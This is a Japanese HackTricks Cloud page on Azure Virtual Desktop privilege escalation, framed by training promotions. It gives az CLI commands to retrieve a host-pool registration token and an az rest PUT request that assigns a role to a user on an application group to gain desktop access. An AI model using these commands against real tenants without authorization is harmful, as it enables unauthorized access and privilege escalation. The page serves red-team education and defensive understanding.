Az - Virtual Desktop Privesx
Reading time: 3 minutes
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
Azure Virtual Desktop Privesc
Azure Virtual Desktopに関する詳細情報は、以下を確認してください:
Microsoft.DesktopVirtualization/hostPools/retrieveRegistrationToken/action
ホストプール内の仮想マシンを登録するために使用される登録トークンを取得できます。
az desktopvirtualization hostpool retrieve-registration-token -n testhostpool -g Resource_Group_1
Microsoft.Authorization/roleAssignments/read, Microsoft.Authorization/roleAssignments/write
warning
これらの権限を持つ攻撃者は、これよりもはるかに危険なことを行うことができます。
この権限を使用すると、仮想デスクトップの仮想マシンにアクセスするために必要なアプリケーショングループにユーザー割り当てを追加できます。
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP_NAME>/providers/Microsoft.DesktopVirtualization/applicationGroups/<APP_GROUP_NAME>/providers/Microsoft.Authorization/roleAssignments/<NEW_ROLE_ASSIGNMENT_GUID>?api-version=2022-04-01" \
--body '{
"properties": {
"roleDefinitionId": "/subscriptions/<SUBSCRIPTION_ID>/providers/Microsoft.Authorization/roleDefinitions/1d18fff3-a72a-46b5-b4a9-0b38a3cd7e63",
"principalId": "<USER_OBJECT_ID>"
}
}'
ユーザーがデスクトップまたはアプリにアクセスできるようにするには、VMに対してVirtual Machine User Login
またはVirtual Machine Administrator Login
の役割も必要です。
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。